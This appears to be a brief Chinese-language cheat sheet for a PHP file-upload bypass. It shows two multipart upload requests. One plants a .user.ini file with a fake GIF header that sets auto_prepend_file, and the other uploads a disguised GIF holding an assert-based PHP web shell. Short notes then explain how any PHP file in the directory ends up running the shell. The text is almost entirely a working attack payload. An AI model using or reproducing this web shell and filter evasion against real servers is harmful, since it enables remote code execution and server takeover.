.user.ini
文件上传
上传.user.ini
Content-Disposition: form-data; name="fileUpload"; filename=".user.ini"
Content-Type: image/gif
GIF89a
auto_prepend_file=1.gif
上传shell
Content-Disposition: form-data; name="fileUpload"; filename="1.gif"
Content-Type: image/gif
GIF89a
<script language='php'>assert($_REQUEST[1]);</script>
最后使用同目录下的index.php文件运行shell
因为.user.ini会使当前目录下的所有php文件包含auto_prepend_file后的文件